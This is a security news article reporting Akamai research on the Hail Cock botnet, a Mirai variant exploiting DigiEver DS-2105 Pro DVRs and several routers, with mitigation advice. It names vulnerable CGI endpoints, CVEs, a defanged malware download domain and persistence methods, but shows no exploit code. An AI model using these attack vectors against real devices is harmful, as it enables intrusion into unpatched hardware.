DigiEver DVR Vulnerability Under Attack by Hail Cock Botnet

Hail Cock Botnet

Akamai Security Intelligence Research Team (SIRT) has uncovered a vulnerability in DigiEver DS-2105 Pro DVRs is being actively exploited by the Hail Cock botnet, a Mirai variant enhanced with modern encryption techniques.

The Hail Cock botnet thrives on unpatched devices, exploiting vulnerabilities such as:

  1. DigiEver DS-2105 Pro DVR: A remote code execution (RCE) flaw through the /cgi-bin/cgi_main.cgi endpoint allows attackers to inject malicious commands. This vulnerability was originally discovered by Ta-Lun Yen of TXOne Research.
  2. TP-Link Devices (CVE-2023-1389): Targets the /cgi-bin/luci endpoint to download and execute malicious scripts.
  3. Tenda HG6 Routers: Exploits remote command injection vulnerabilities in the firmware.
  4. Teltonika RUT9XX Routers (CVE-2018-17532): Uses a similar method to deploy malware.

The attack chain often begins with HTTP POST requests to download Mirai malware variants, escalating to broader network compromises. By targeting outdated firmware, the botnet gains control of devices that manufacturers no longer support.

Unlike earlier Mirai botnets, the Hail Cock malware employs modern cryptographic techniques such as ChaCha20 and XOR for decryption. This evolution indicates a shift in tactics to evade detection. “Although employing complex decryption methods isn’t new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators,” Akamai noted.

The malware’s persistence mechanisms include cron jobs to download additional payloads from domains like hailcocks[.]ru. Its command-and-control (C2) communications leverage dynamic domains, ensuring consistent operation even as infrastructure changes​.

Adding an odd twist, compromised devices display unique console messages upon infection. Older variants of the malware print “you are now apart of hail cock botnet,” while newer versions of the malware will print the phrase, “I just wanna look after my cats, man.”

The DigiEver DS-2105 Pro, now over a decade old, exemplifies the vulnerabilities of unsupported hardware. “One of the easiest methods for threat actors to compromise new hosts is to target outdated firmware or retired hardware,” Akamai warns. Upgrading to newer, supported models is strongly recommended to mitigate these risks.

Akamai has provided indicators of compromise (IoCs) to aid in defending against the Hail Cock botnet. Recommendations for mitigation include:

  • Firmware Updates: Regularly update device firmware to patch known vulnerabilities.
  • Network Segmentation: Isolate IoT devices from critical networks to limit exposure.
  • Strong Credentials: Replace default passwords with robust, unique ones

Related Posts: